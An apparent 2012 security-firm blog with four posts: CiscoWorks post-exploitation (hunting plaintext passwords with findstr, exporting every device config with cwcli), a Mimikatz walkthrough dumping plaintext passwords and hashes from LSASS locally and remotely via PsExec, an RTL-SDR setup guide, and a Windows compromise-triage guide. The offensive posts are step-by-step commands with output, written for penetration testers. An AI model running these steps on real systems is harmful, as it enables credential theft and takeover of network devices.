Tuesday, June 26, 2012

Hack Tips: CiscoWorks Exploitation

by Tony Lee.

This article is the third in a series (See Hack Tips: Blackberry Enterprise Server and Hack Tips: Good For Enterprise) covering, step-by-step, practical post-exploitation tips that can be used to get the most out of various common network servers. This week’s victim is CiscoWorks. Compromising this server allows the attacker to remotely control network devices and dump all device configurations.

Even though CiscoWorks is End of Life (EOL)--replaced by Cisco Prime Infrastructure (CPI), we still see this management product present in many environments--thus is it still useful to know how to get the goods from Works.

Overview

Overall, the process involves the following steps:
  1. Identifying a CiscoWorks Server
  2. Obtaining CiscoWorks Administrator Credentials
  3. Interfacing with the CiscoWorks Web Interface
  4. Interfacing with the CiscoWorks Command Line Interface
  5. Dumping configs from CiscoWorks


Identifying The Host

  1. Host naming scheme
    • \\CiscoWorksBox
    • \\CISCOWKS
    • \\NETMNG
  2. Application Directory
    • C:\Program Files (x86)\CSCOpx
  3. User accounts
    • causer (Ciscoworks anonymous access user)
      C:\ >net user
      
      User accounts for \\CiscoWorksDemoBox
      
      ----------------------------------------------------------
      casuser                  user                  user2
      user3
      The command completed successfully.
      
      
  4. Services
    • These Windows services are started:
      C:\ >net start
      
      --SNIP--
         CiscoWorks ANI database engine
         CiscoWorks Daemon Manager
         CiscoWorks RME NG database engine
         CiscoWorks Tomcat Servlet Engine
         CiscoWorks Web Server
      
      

Identifying Ciscoworks Account Credentials

  1. Dump the local Windows password hashes and crack them
  2. Data mine the Cisco works box for .bat and .txt files that contain plaintext credentials. This is surprisingly successful, network engineers are usually responsible for managing Ciscoworks and they are notorious for being security ignorant. We recently found a test .bat file that was using ut.exe (a Ciscoworks tool) that disclosed the Cisco Works credentials in plain-text.
    • findstr /I /S /M pass c:\*
    • dir /a /s /b c:\*pass*


Interacting with Ciscoworks

Next we'll take a look out how we can interact with Ciscoworks and pull data from it.

Using the Ciscoworks Web Interface


CiscoWorks interface and options post-authentication

Source: http://www.netadmin.calpoly.edu/tools/cv-images/homepage.jpg

Surf to either of the URLs below for nice screenshots and great summarizations
  • http://hostname:1741
  • https://hostname

From the local system, you can confirm Ciscoworks is listening by checking for a listener on TCP 1741, or TCP 443:
C:\> netstat -ano | findstr 1741
  TCP    0.0.0.0:1741           0.0.0.0:0              LISTENING       5136

C:\ >netstat -ano | findstr 443
  TCP    0.0.0.0:443           0.0.0.0:0              LISTENING       5136


Using the Ciscoworks Command line Application

The Ciscoworks command line application (cwcli.exe) have tons of options, including remotely running commands on devices! This could be very useful for an attacker, just use it with caution, because it could really get you into trouble if you don't know what you're doing!

Running cwclie.exe is more or less straightforward, but you'll definitely have to check out the -help for all features.

C:\Program Files (x86)\CSCOpx\bin>cwcli.exe -help
------------------------------------
CiscoWorks command line Application.
------------------------------------
General syntax to run a command with arguments is
cwcli  

For detailed help on a command and it's arguments, run
cwcli  -help

Dumping Device Configs from CiscoWorks

One note worthy feature of cwclie.exe is its ability to dump device configurations from the command line! If you had an unlimited amount of time, you could obtain every config from every device on the network. Here's how to tell cwclie.exe to grab those configs.

C:\Program Files (x86)\CSCOpx\bin>cwcli.exe export config -u  -p  -device %

SUMMARY
========
        Successful: ConfigExport: C:/PROGRA~2/CSCOpx/files/rme/cwconfig


The % character is a wild card when using cwclie.exe. Using this, you could potentially dump all configuration from all Ciscoworks-managed devices! Just note that this could take a really long time on a large network. Also, its probably worth while for us to note that as a general best practice, system administrators should never use the -p option and specify the password on the command line -- this includes within scripts.

And just to confirm we dumped some configurations:
C:\Program Files (x86)\CSCOpx\bin>dir ..\files\rme\cwconfig
Volume in drive C has no label.
Volume Serial Number is 0000-0000

Directory of C:\Program Files (x86)\CSCOpx\files\rme\cwconfig

12/25/2011  06:40 PM    <DIR>          .
12/25/2011  06:40 PM    <DIR>          ..
12/25/2011  06:40 PM            26,621 2011-11-09-06-40-28-950-devicename.xml
12/25/2011  06:40 PM            26,768 2011-11-09-06-40-29-919-devicename.xml
12/25/2011  06:40 PM            30,782 2011-11-09-06-40-30-294-devicename.xml
12/25/2011  06:40 PM            27,441 2011-11-09-06-40-30-591-devicename.xml
12/25/2011  06:40 PM            30,656 2011-11-09-06-40-30-841-devicename.xml
12/25/2011  06:40 PM            30,833 2011-11-09-06-40-31-247-devicename.xml
               6 File(s)        173,101 bytes
               2 Dir(s)  129,615,876,096 bytes free



Enjoy!


Tuesday, June 19, 2012

Using Mimikatz to Dump Passwords!

By Tony Lee.

If you haven't been paying attention, Mimikatz is a slick tool that pulls plain-text passwords out of WDigest (explained below) interfaced through LSASS. There are a few other blogs describing mimikatz on the net, but this will hopefully provide more details about the components involved and ideas on how to use it. The tool itself and the download page is in French, so it makes it “fun” to use if you don’t speak french :)

Download

Mimikatz can be downloaded from:

A couple of things to take into consideration:
  1. The tool has 32-bit and 64-bit versions – make sure you pick the correct version (systeminfo is your friend)
  2. You need to run it as admin (need debug privs)
  3. Needs a DLL called sekurlsa.dll in order to inject into lsass.exe and dump the hashes in clear text (important to know especially for a remote dumping)

Use Cases


The key feature of this tool that sets it apart from other tools is its ability to pull plain-text passwords from the system instead of just password hashes. If your intention is to stay within the Windows environment and pass the hash this may not be that big of a deal. However, if you are exploring the curious case of password reuse across different environments—the plain-text password can be quite useful. For example, you have compromised a “Good for Enterprise” server that has a web interface which is not tied into AD single sign on. It might be useful to have the Good admin’s plain-text password to try against the Good for Enterprise web interface. Additionally, unless you have significant computational power, you may not crack an NTLM password hash—thus pulling the plain-text proves useful once again.

What the heck is WDigest?


WDigest is a DLL first added in Windows XP that is used to authenticate users against HTTP Digest authentication and Simple Authentication Security Layer (SASL) exchanges. Both of these require the user’s plain-text password in order to derive the key to authenticate—thus why it is stored in plain-text.


Source: http://technet.microsoft.com/en-us/library/cc778868(WS.10).aspx

Running mimikatz


To run mimikatz you'll need mimikatz.exe and sekurlsa.dll on the system you're targeting. Once you launch mimikatz.exe from the command line you'll be provided with an interactive prompt that will allow you to perform a number of different commands. In the next sections we'll go over the following commands:

  • privilege::debug
  • inject::process lsass.exe sekurlsa.dll
  • @getLogonPasswords


Running locally (Windows 2008 R2 – 64-bit)


To enter the interactive command mimikatz command prompt, just launch the executable:
mimikatz.exe


You'll be presented with a banner and a prompt:
C:\Users\Administrator\Desktop\mimikatz_trunk\x64>mimikatz.exe
mimikatz 1.0 x64 (alpha)        /* Traitement du Kiwi (Feb  9 2012 01:49:24) */
// http://blog.gentilkiwi.com/mimikatz

mimikatz # 



Next, we'll need to enable debug mode with the privilege::debug command:
mimikatz # privilege::debug
Demande d'ACTIVATION du privilège : SeDebugPrivilege : OK
mimikatz # 


Then we'll need to inject sekurlsa.dll into LSASS, but using the inject::process command:
mimikatz # inject::process lsass.exe sekurlsa.dll
PROCESSENTRY32(lsass.exe).th32ProcessID = 448
Attente de connexion du client...
Serveur connecté à un client !
Message du processus :
Bienvenue dans un processus distant
                        Gentil Kiwi

SekurLSA : librairie de manipulation des données de sécurités dans LSASS
mimikatz # 


Finally, we'll pull any available login passwords using the @getLogonPasswords macro:
mimikatz # @getLogonPasswords

Authentification Id         : 0;126660
Package d'authentification  : NTLM
Utilisateur principal       : Administrator
Domaine d'authentification  : FS
        msv1_0 :        lm{ f67ce55ac831223dc187b8085fe1d9df }, ntlm{ 161cff084477fe596a5db81874498a24 }      
        wdigest :       1qaz@WSX        
        tspkg :         1qaz@WSX

--SNIP--

mimikatz # exit
Fermeture du canal de communication




You should see one entry for each user. Note the msv1_0 and wdigest fields. The former contains the LM and NTLM hashes for the Administrator user (defined by "Utilisateur principal") and the later contains the WDigest entry, which is the plain text password of the user!

Running Remotely (Windows 2003 – 32-bit)


Running mimikatz remotely, is more or less the same, but if you'll need to establish a connection on the system first. We'll do that here by using the built in Windows net commands and psexec.

We'll need to map the target remotely in order to copy over sekurlsa.dll. First we'll establish a connection to the servers admin$ share. Note that this will require pre-existing access to the server, so you'll need a valid credential to map the share:
net use \\169.254.73.91\admin$ /u:169.254.73.91\mimidemo


Then just copy over sekurlsa.dll:
C:\Users\Administrator\Desktop\mimikatz_trunk\tools> copy ..\Win32\sekurlsa.dll \\169.254.73.91\admin$\system32  



Finally, we'll use psexec to run mimikatz:
C:\Users\Administrator\Desktop\mimikatz_trunk\tools>PsExec.exe /accepteula \\169.254.73.91 -c c:\Users\Administrator\Desktop\mimikatz_trunk\Win32\mimikatz.exe

PsExec v1.98 - Execute processes remotely
Copyright (C) 2001-2010 Mark Russinovich
Sysinternals - www.sysinternals.com


mimikatz 1.0 x86 (alpha)        /* Traitement du Kiwi (Feb  9 2012 01:46:57) */
// http://blog.gentilkiwi.com/mimikatz

mimikatz # 


Now at our mimikatz prompt, we can just do the same as if we running it locally:
C:\Users\Administrator\Desktop\mimikatz_trunk\tools>PsExec.exe /accepteula \\169.254.73.91 -c c:\Users\Administrator\Desktop\mimikatz_trunk\Win32\mimikatz.exe

PsExec v1.98 - Execute processes remotely
Copyright (C) 2001-2010 Mark Russinovich
Sysinternals - www.sysinternals.com


mimikatz 1.0 x86 (alpha)        /* Traitement du Kiwi (Feb  9 2012 01:46:57) */
// http://blog.gentilkiwi.com/mimikatz



mimikatz # privilege::debug
Demande d'ACTIVATION du privil+¿ge : SeDebugPrivilege : OK



mimikatz # inject::process lsass.exe sekurlsa.dll
PROCESSENTRY32(lsass.exe).th32ProcessID = 432
Attente de connexion du client...
Serveur connect+¬ +á un client !
Message du processus :
Bienvenue dans un processus distant
                        Gentil Kiwi

SekurLSA : librairie de manipulation des donn+¬es de s+¬curit+¬s dans LSASS



mimikatz # @getLogonPasswords

--SNIP--

Authentification Id         : 0;184995
Package d'authentification  : NTLM
Utilisateur principal       : PowerAccnt
Domaine d'authentification  : SWITCH
        msv1_0 :        lm{ 00000000000000000000000000000000 }, ntlm{ 37**********************89 }
        wdigest :       j************************\  <-  Service account with Admin Privileges and suuuper long password   - Ouch


Authentification Id         : 0;62703
Package d'authentification  : NTLM
Utilisateur principal       : Administrator
Domaine d'authentification  : SWITCH
        msv1_0 :        lm{ 00000000000000000000000000000000 }, ntlm{ 4***************************d }
        wdigest :       ********************                                                        <- Admin account with suuuper long password    - Ouch

--SNIP--

mimikatz # exit
Fermeture du canal de communication




Cleanup


To delete sekurlsa.dll from the remote system:
del \\169.254.73.91\admin$\system32\sekurlsa.dll


Then just double check its not there with:
dir \\169.254.73.91\admin$\system32\sekurlsa.dll
Volume in drive \\169.254.73.91\admin$ has no label.
Volume Serial Number is 34C7-0000

Directory of \\169.254.73.91\admin$\system32

File Not Found



Finally, we can remove our connection to the server:
net use \\169.254.73.91\admin$ /del
\\169.254.73.91\admin$ was deleted successfully.



Final Thoughts

Insanely awesome tool--huge thanks to the author for sharing! This capability can be instrumental in leveraging password reuse. This makes another tool to add to the security toolbox for sure. Also note that Hernan Ochoa added this capability to Windows Credential Editor version 1.3 Beta using the "-w" flag.

Got some tips of your own? Let us know in the comments below!!!


Tuesday, June 12, 2012

Getting Started with GNU Radio and RTL-SDR (on Backtrack)

By Brad Antoniewicz.

In this blog post I'll aim to get you at least partially familiar with Software Defined Radio, the Realtek RTL2832U chipset, and provide Backtrack 5 R2 setup and usage instructions so that you can easily get off to a good start.

Software Defined Radio


In the last few years, Software Defined Radio (SDR) has been drawing a lot of attention from radio enthusiasts and hackers alike. This is because SDRs move much of the signal processing from hardware into software. This provides incredible flexibility. For instance, normally, with your standard 2.4GHz 802.11 adapter, your use cases are relatively limited: transmitting and monitoring 802.11 traffic on the 2.4GHz spectrum. However with an SDR, since the processing is not locked into the firmware of the adapter, you have greater capabilities: you're only limited by the frequency spectrum the card supports (within 2.4GHz) and not the protocol. So you could then transmit and monitor anything that exists within the 2.4GHz spectrum such as cordless phones, bluetooth devices, microwave ovens, car alarms, video devices, ZigBee (the list goes on and on), and of course, 802.11.

GNU Radio



GNU Radio is the development toolkit that handles the signal processing from the SDR hardware (or a from a file containing signaling information). This is essentially the work horse of SDR. Unfortunately, GNU Radio has a bad reputation for being not so well documented and a bit bloated. That's ok though, whether you agree or not, you cannot deny that it's maintainers are doing really amazing work. In my opinion, if you don't like the documentation, then its up to you to write good guides so that people can utilize this great work.

Hardware


Obviously a big component of SDR is the hardware. Although there are a number of different platforms out there, we'll discuss the USRP and ones utilizing the RTL2832U chipset (since its the topic of this blog post).

USRP



The Universal Software Radio Peripheral (USRP) by Ettus Research (who must be raking in the dough, based on their new website) is, and pretty much has been, the defacto hardware component of SDR for the last 5 years (probably more). The USRP is modular and can support just about any radio frequency spectrum.

The USRP's main problem is that its really expensive. The main component ranges from $650 - $1700, and then you need daughter boards for the specific frequency spectrum you want to play with, which are $74-$450 each. Then there are antennas, cables, and other accessories. Sure, you could always use the open source schematics to build your own, but seriously, who the heck is going to do that. In a community that is known for being creative with costs, the USRP really builds a wall between the classes. Sucks..

Realtek RTL2832U



It was recently discovered that a number of manufacturers have released digital TV USB capture devices that leverage the Realtek RTL2832U Chipset. The chipset was created with the intention of doing DVB-T (digital TV) and COFDM (radio) demodulation for these adapters, however a curious radio enthusiast named Antti Palosaari, discovered that:

These $20 adapters are actually SDRs!

As you can imagine, this discovery sparked a whole lot of interest. Soon the Osmocom OsmoSDR team built the necessary software to interact with the chipset and called it RTL-SDR. Additionally, RTL-SDR fans started documenting all of their experiences on the /r/RTLSDR/ subreddit page. People began doing everything they could with their brand new, super cheap, RTL-SDRs


Supported Frequencies

One of the major downsides to the RTL2832U is that it supports only 64 – 1700 MHz (at most). This means we're somewhat confined to the technologies we can play with. That being said, it's really nothing to complain about because there are a ton of things within that frequency spectrum (and for $20, complaining is not allowed)!


Supported Adapters

It's pretty crucial that when choosing what DVB-T dongles you buy, you first consult the various compatibility lists out there to ensure the adapter you're looking at, actually has a RTL2832U chipset and works well. Here are a couple to consult:

Where to buy
The one shown in the picture is mine, which was actually gifted to me (Thanks Steve!), bought at Deal Extreme (a.k.a. the shadiest site I buy from on the internet). Its the "DVB-T TV Receiver Realtek RTL2832U Elonics E4000 Radio P335", and can also be found on eBay for $18.88 (free shipping).

There's a list of adapters and where to buy them at:

Configuration


The Windows RTL-SDR setup and configuration is pretty well documented in a variety of places online. I like to use Linux for most of my tinkering, so this guide will focus specifically on setting things up and using Backtrack 5 R2. If you're using MacOSX, you're kind of screwed - RTL-SDR requires GNU Radio >= v3.5.3, and macports doesn't have it pre-built for you, compiling from source is super painful and requires a lot of manual code edits to get things working. Stick with a BT5R2 or Windows Virtual Machine until someone actually gets a macports package out.

Making sure your adapter is registered


Before doing anything, make sure you have the adapter plugged in and its detected by the system.
 root@bt:~# lsusb | grep -i RTL  
 Bus 001 Device 008: ID 0bda:2832 Realtek Semiconductor Corp. RTL2832U DVB-T  


Manual Labor


The people over at hack4fun wrote up an article about how to build everything from scratch. If you'd like to, that's a good guide to get you up and running to a certain point, but the truth is, you don't need to do that much work. There are a couple of scripts and other things that will accomplish the exact same thing (build form source) with much less typing.

The build-gnuradio script


Marcus Leech wrote a really simple to use script called build-gnuradio. This works great, but needs a handful of modifications in order to work on Backtrack. The main changes are to remove the sudo checks since Backtrack runs as root. I also added a patch for gr-smartnet to work a little better. An obviously more secure alternative would be to create a non-root user and run the script, but since I always use Backtrack in a non-persistent mode, that isn't a major concern of mine.

My modified version of the build-gnuradio script (called build-gnuradio-bt) can be downloaded here: Note: At the time of this writing the author of gr-smartnet just started to resume work on the project. There's a possibility that by the time you read this, he'll have figured out a way around the above gnuradio patch.

The way the script works is that it checks for a packages directory (included in the bundle described in the "The really easy way" section below), and if it doesn't find it, it defaults to the standard build-gnuradio script functionality and downloads all the required sources, compiles them, and installs. During the gnuradio build it will look for a "patches/gnuradio_gri_wav-v0.1.patch" file that patches gnuradio to work with gr-smartnet. If it can't find the patch, it'll just continue on and compile. To run the script, make sure you have internet access and type:
root@bt:~# wget https://raw.github.com/brad-anton/gnuradio/master/build-gnuradio-bt
root@bt:~# mkdir patches
root@bt:~# cd patches
root@bt:~# wget https://raw.github.com/brad-anton/gnuradio/master/gnuradio_gri_wav-v0.1.patch
root@bt:~# cd ..
root@bt:~# chmod +x build_gnuradio_bt
root@bt:~# ./build_gnuradio_bt


It will take some time to run so be patient. If you're using non-persistent backtrack or don't want to wait a long time for everything to compile, check out the next section, its much faster.

The really easy way


Since I use non-persistent Backtrack a lot and often don't have internet access when I do so, I built everything from scratch then created packages for all of the components.

The downside of this way is that you'll have to download a 290mb file that contains all the packages, but once that's done, its smooth sailing from there.

You can download the bundle (gnuradio_rtl-sdr_bt5r2_bundle_v0.1.tar.bz2) here: Integrity Checks:
md5sum gnuradio_rtl-sdr_bt5r2_bundle_v0.1.tar.bz2
a603351e08318a963ee850c69acfcbb8 gnuradio_rtl-sdr_bt5r2_bundle_v0.1.tar.bz2

sha1sum gnuradio_rtl-sdr_bt5r2_bundle_v0.1.tar.bz2
66eeb8eaace16f2af73b7d77be3c035fa2359f81 gnuradio_rtl-sdr_bt5r2_bundle_v0.1.tar.bz2


I just copy the bundle to the root of my BT5R2 USB stick, then once its booted, just:

root@bt:~# tar -jxf /cdrom/gnuradio_rtl-sdr_bt5r2_bundle_v0.1.tar.bz2 
root@bt:~# cd gnuradio_rtl-sdr_bt5r2_bundle_v0.1/
root@bt:~/gnuradio_rtl-sdr_bt5r2_bundle_v0.1# ./build-gnuradio-bt 


The script will ask you to proceed and you should see output similiar to this:
[+] Offline install -> Installing gnuradio + supporting libraries
[+] Removing potentially conflicting packages
[+] Installing precompiled binaries from /root/gnuradio_rtl-sdr_bt5r2_bundle_v0.1/packages
[+] Wrapping up install
[+] Copying util to ~/rtl_sdr-utils
[+] Offline installation Completed! Enjoy!


Then you can rm the directory to free up disk space
root@bt:~/gnuradio_rtl-sdr_bt5r2_bundle_v0.1# cd ..
root@bt:~# rm -rf gnuradio_rtl-sdr_bt5r2_bundle_v0.1/


Using RTL-SDR


Once you have it all installed, a simple test to make sure the adapter is getting recognized is to use the rtl_test utility to run a quick benchmark. Your output should be similar:

root@bt:~# rtl_test -t
Found 1 device(s):
  0:  Generic RTL2832U (e.g. hama nano)

Using device 0: Generic RTL2832U (e.g. hama nano)
Found Elonics E4000 tuner
Supported gain values (18): -1.0 1.5 4.0 6.5 9.0 11.5 14.0 16.5 19.0 21.5 24.0 29.0 34.0 42.0 43.0 45.0 47.0 49.0 
Benchmarking E4000 PLL...
[E4K] PLL not locked for 51000000 Hz!
[E4K] PLL not locked for 2219000000 Hz!
[E4K] PLL not locked for 1109000000 Hz!
[E4K] PLL not locked for 1237000000 Hz!
E4K range: 52 to 2218 MHz
E4K L-band gap: 1109 to 1237 MHz
root@bt:~# 


Multimode.py

Marcus Leech created a tool called Multimode that acts as a multi-mode receiver for a variety of modes such as FM, AM, SSB, WFM, and TV-FM. This is the perfect tool to start playing with SDR.

Installation

If you used the easy way above, then multimode is already installed, if not, you'll need to do it.
root@bt:~# svn co https://www.cgran.org/svn/projects/multimode
A    multimode/trunk
A    multimode/trunk/multimode_helper.py
A    multimode/trunk/multimode.py
A    multimode/trunk/COPYING
A    multimode/trunk/multimode.grc
A    multimode/trunk/Makefile
A    multimode/trunk/README
Checked out revision 996.
root@bt:~# cd multimode/trunk/
root@bt:~/multimode/trunk# make install
mkdir -p /root/bin
cp multimode.py multimode_helper.py /root/bin
Please make sure your PYTHONPATH includes /root/bin
And also that PATH includes /root/bin
this will allow multimode to work correctly
root@bt:~/multimode/trunk# export PYTHONPATH=$PYTHONPATH:/root/bin
root@bt:~/multimode/trunk# export PATH=$PATH:/root/bin

Interface


If you launch mutlimode with no options:
root@bt:~/bin# ./multimode.py 

It will listen on 150FM. Make sure you have your speakers turned on and volume up. Remember mutlimode is decoding the over the air signals and playing them back for your enjoyment, no sound = no fun. Obviously if nothing is transmitting in your area on 150MHz then you'll need to change it.

The interface can become a little sluggish and sometimes unresponsive on slower machines, so be patient. It is broken up into three main parts:
  1. Controls (Top)
  2. Spectrograph (Middle)
  3. Panorama (Bottom)



The guys at hack4fun cut out the spectrograph in the version they use on their site, because the panorama was getting cut off by the bottom of the screen.

Listening to FM Radio!


The local [crappy] radio station here in NYC is Z100, or more specifically 100.3FM. To leverage multimode.py to access it, just launch it with the following attributes:
root@bt:~/bin# ./multimode.py --freq 100.3M --dmode=WFM

And you should be able to hear the radio station playing!

Need the weather forecast? Checkout 162.550:

root@bt:~/bin# ./multimode.py --freq 162.550M

Listening to Local Law Enforcement!


Law enforcement is another great thing to listen to. Since everything is so close together in NYC, you can pick up almost all precincts, so lets see whats going on with the 17th! It's non-trunked and operating at 476.58750 so lets key that into multimode:
root@bt:~/bin# ./multimode.py --freq 476.587M --ftune=5k

And if you keep an eye on the Spectrograph, you can see if there is activity on neighboring frequencies (precincts).



Other Notable Fun!


The GNURadio community is massive and there are a ton of people writing great code to leverage SDR's capabilities. Here's a short list of things that may appeal to our audience:

For more applications written for GNU Radio (specifically RTL-SDR) see:

Using the GNU Radio Companion


One of the most powerful components of GNU Radio is the GNU Radio Companion (GRC). It allows you to graphically program GNU Radio applications!

Creating a Spectrum Analyzer


Probably the simplest application to write using GRC is a spectrum analyzer. Since this is just meant as a quick introduction, we'll create a very stripped down spectrum analyzer to demonstrate some of the power of GRC.

Launching GRC

Launching GRC will require you to be running X, then just run:
root@bt:~# gnuradio-companion
A new window should open up, this is your development environment!

The GRC interface is split into three panes:
  1. The development area (Main Area/Left pane): This is where you'll create your flow graph
  2. Logging pane (Lower): Provides logging and debugging messages
  3. Block (Right pane): Lists the different development blocks that will make up your flow graph and application

Creating a Signal Flow Graph


Since GNU Radio can accept input from a variety of sources, the first thing we'll want to define is the actual source for our application. Since we've been using RTL-SDR, lets pick that.

Under "Sources" select "RTL2832 Source" from the Block pane and drag it into the development area.

Note: According to the comments below, it makes more sense to use the OsmoSDR source, since its the official and latest greatest!



Next, we'll need to define something to do with our source. Since we want to create a spectrum analyzer, the "FFT sink" block is just what we need as it will show us what the spectrum looks like. We'll use the one under "WX GUI" to leverage wxPython.

Under "WX GUI Widgets" select "WX GUI FFT Sink from the block pane and drag it into the development area.



We'll have to also connect our Source to the FFT Sink. Click once on "Out" on the Source block then click "In" on the FFT Sink block. This will take the output from our RTL2832 and send it to the FFT sink.



You'll notice that the title of the source block (RTL2832 Source) and an attribute within the block (Frequency) are both highlighted Red. This indicates a potential error: Frequency is a required attribute and it is undefined. Lets fix that

Double click the source block and set a frequency. Here we'll define that of our radio station (100.3) which in Hz translates to 100300000. The E Notation of that is 1003e5.



That's all there is to it! Now generate everything by going to "Build" -> "Generate" (or by pressing the generate button). You should be prompted to save first, so here I'll just save it to /root/simple_test.grc:



Then run it by going to "Build" -> "Execute" (or by pressing the execute button). A new window should open up showing the signal in real time:



Depending on the power of your system, the window may be a little unresponsive or sluggish. We don't really need a throttle (a block between the source and the FFT sink) but if we add one, it'll fix that a bit.

If you check the "Average" you can clean up the signal:



The "Peak" checkbox will draw a line on the peaks, which can be useful if the signal is rapidly changing and you're trying to get an idea of what frequencies are being transmitted on:



If you wanted to always have the "Average" and "Peak" checked, you can modify the FFT Sink in the original drawing and set the two to "On":



To share your flows with other people, just send them your .grc (/root/simple_test.grc). You'll notice another file was created in the same directory, /root/simple_test.py. This is the Python source file for your application. If you didn't want to run GRC, you can launch the application independently:

root@bt:~ # ./simple_test.py


Want to learn more? Just yesterday (seriously, GNURadio is freaking exploding because of RTL-SDR), balint256 just put together a group of GNU Radio tutorials that will take you to the next level! Check them out here!

Got tips for GNU Radio or RTL-SDR? See something I got wrong above? Speak up in the comments below!!



Tuesday, June 5, 2012

Am I pwn3d? Windows *Non-Native* Tool Triage

By Tony Lee, Jerry Pierce, and Vijay Agarwal.

This is a continuation of our previous article on performing a Windows triage--however this time we will try to avoid using native Windows tools. Note that there are lots of GUI tools that can help perform basic forensics, however we use mostly command line tools or options as it does not trample on evidence as much as the GUI tools and it makes writing the data to a file easier for offline analysis. We will continue with the same premise as before:

So, you are surfing the web, checking your email, and performing other daily tasks… $#@!, you just realized you clicked a link, opened an attachment, or visited a site that you probably should not have. So what do you do? Cry a little or take action?

Perhaps a friend, family member or neighbor approaches you and asks you to help them “fix their computer” or they say, “I think I have been hacked!”

Whatever the scenario, we have outlined some steps--using mostly Non-native Windows binaries--that you can follow in order to do a little preliminary analysis to detect potential compromise and triage the system

Indicators of Compromise Covered


  • Processes
  • Network Connections
  • Common File Locations
    • System32
    • Home Directory
  • Persistence Mechanisms
    • Services
    • Registry
    • Tasks
    • Startup Directory

If your relative/friend or family member is remote, you will most likely have to send the output to a file or have them read it to you (good luck with that if they aren’t technical), but it is a start.

Note: If you cannot coach family members to get to the cmd prompt--all hope may already be lost ;)

Examine Processes


The following tool, pslist, is from Mark Russinovich (of sysinternals--now Microsoft). Pslist can be downloaded from http://technet.microsoft.com/en-us/sysinternals/bb896682. It will list the process name, process ID (PID), CPU Time and other information.

pslist >> output.txt

Sample Output
C:\>pslist

pslist v1.29 - Sysinternals PsList
Copyright (C) 2000-2009 Mark Russinovich
Sysinternals

Process information for PC122:

Name                Pid Pri Thd  Hnd   Priv        CPU Time    Elapsed Time
Idle                  0   0   1    0      0     3:57:34.937     0:00:00.000
System                4   8  48  340      0     0:01:01.421     0:00:00.000
smss                604  11   3   19    168     0:00:00.031     4:05:30.375
csrss               652  13  12  375   1772     0:00:15.000     4:05:29.265
winlogon            676  13  17  547   7400     0:00:01.171     4:05:29.109
services            720   9  15  261   1664     0:00:03.859     4:05:28.609
lsass               732   9  22  357   3764     0:00:03.968     4:05:28.562
svchost             892   8  14  190   2888     0:00:01.156     4:05:27.890
svchost             960   8   7  235   1640     0:00:02.656     4:05:27.609
svchost            1072   8  67 1251  14668     0:00:20.593     4:05:27.406
svchost            1132   8   6   80   1272     0:00:02.156     4:05:26.875
svchost            1272   8   5   90   1196     0:00:02.781     4:05:26.625
explorer           1408   8   9  330  10304     0:00:15.421     4:05:25.578
VMwareUser         1648   8   1   26    888     0:00:01.000     4:05:23.937
ctfmon             1660   8   1   69    840     0:00:01.546     4:05:23.843
wracing            1680   8   1   19    324     0:00:41.609     4:05:23.687
sqlmangr           1692   8   2   76   1252     0:01:35.203     4:05:23.609
svchost            1808   8   5  107   1272     0:00:03.968     4:05:18.156
inetinfo           1864   8  18  269   3992     0:00:14.140     4:05:17.953
sqlservr           1880   8  21  214  13068     0:00:01.640     4:05:17.859
VMwareService       128  13   3   47    696     0:01:25.015     4:05:14.359
alg                1168   8   6  105   1132     0:00:01.656     4:05:11.046
cmd                1928   8   1   31   2264     0:00:07.937     3:58:41.046
firefox             380   8  12  343  19320     0:00:04.187     2:55:04.140
notepad            1344   8   1   45   1268     0:00:01.531     2:51:28.015
autoruns           1564   8   5  287  12564     0:00:41.437     2:34:45.015
pslist              696  13   2  115   1040     0:00:00.156     0:00:00.250

Pay attention for oddly named processes, and also look at the “Elapsed Time” column – if the oddly named process appears to have the same elapsed time as the bulk of your Windows processes, it’s a clue that it may be starting either at system boot or when you log into the system.

Another option to “pslist” will display the output in a tree format to easily show the parent process and the rest of the process chain.

pslist -t >> output.txt

Sample Output
C:\>pslist -t

pslist v1.29 - Sysinternals PsList
Copyright (C) 2000-2009 Mark Russinovich
Sysinternals

Process information for PC122:

Name                             Pid Pri Thd  Hnd      VM      WS    Priv
Idle                               0   0   1    0       0      16       0
  System                           4   8  48  340    1884     212       0
    smss                         604  11   3   19    3808     404     168
      csrss                      652  13  12  375   25740    2144    1772
      winlogon                   676  13  17  547   51648    4188    7400
        services                 720   9  15  261   20220    3400    1664
          VMwareService          128  13   3   47   17764    2256     696
          svchost                892   8  14  190   59652    4728    2888
          svchost                960   8   7  235   33644    4148    1640
          svchost               1072   8  67 1251  138856   24388   14668
          svchost               1132   8   6   80   29572    3496    1272
          alg                   1168   8   6  105   32288    3536    1132
          svchost               1272   8   5   90   30980    3248    1196
          svchost               1808   8   5  107   35608    3700    1272
          inetinfo              1864   8  18  269   43944    7904    3992
          sqlservr              1880   8  21  214  559284    7768   13068
        lsass                    732   9  22  357   41392    6004    3764
explorer                        1408   8   9  330   81936   15356   10304
  firefox                        380   8  12  343   85196   29884   19320
  VMwareUser                    1648   8   1   26   27996    2888     888
  ctfmon                        1660   8   1   69   29208    3008     840
  sqlmangr                      1692   8   2   76   35200    4804    1252
  cmd                           1928   8   1   31   30848     980    2264
    pslist                       152  13   2  115   29292    2628    1040
    notepad                     1344   8   1   45   30304    3768    1268
    autoruns                    1564   8   5  287   96192   16500   12564
wracing                         1680   8   1   19    7480    1220     324

The next tool--cmdline--will list the PID, processes, command line arguments, and show the full path to the binary (how helpful!). The tool used to be available from www.diamondcs.com.au, however the site seems to be a squatted site that no longer hosts the tool. You may be able to find this from a reputable friend in the business (feel free to look us up at Foundstone and we can send you a copy--malware free!).

cmdline >> output.txt

Sample Output
C:\>cmdline
CmdLine - DiamondCS Freeware Console Tools (www.diamondcs.com.au)
---
Found 30 processes.

-snip-

C:\WINDOWS\system32\services.exe [720]
  C:\WINDOWS\system32\services.exe

C:\WINDOWS\system32\ctfmon.exe [1660]
  "C:\WINDOWS\system32\ctfmon.exe"

C:\Documents and Settings\Administrator\Local Settings\Temp\wracing.exe [1680]
  "C:\Documents and Settings\Administrator\Local Settings\Temp\wracing.exe"

C:\WINDOWS\system32\notepad.exe [1908]
  notepad test.txt

Once the command has been executed a well trained eye can usually spot something that is odd. If something is unfamiliar, there are many sites that can be used to investigate a binary name such as http://www.processlibrary.com/.

No results from processlibrary.com can be as concerning as a positive bad hit:

Example:
Search results for: wracing.exe
Your search "wracing.exe" did not match any documents.
Make sure the search term was spelled correctly.

Examine Network Connections


The following tool, CurrPorts, is from Nirsoft and is available from http://www.nirsoft.net/utils/cports.html. Please see the full manual at the download site for the many options available. We are just listing our favorite options below:

cports /stext cportsoutput.txt

Sample Output
C:\>cports /stext cportsoutput.txt

-snip-
==================================================
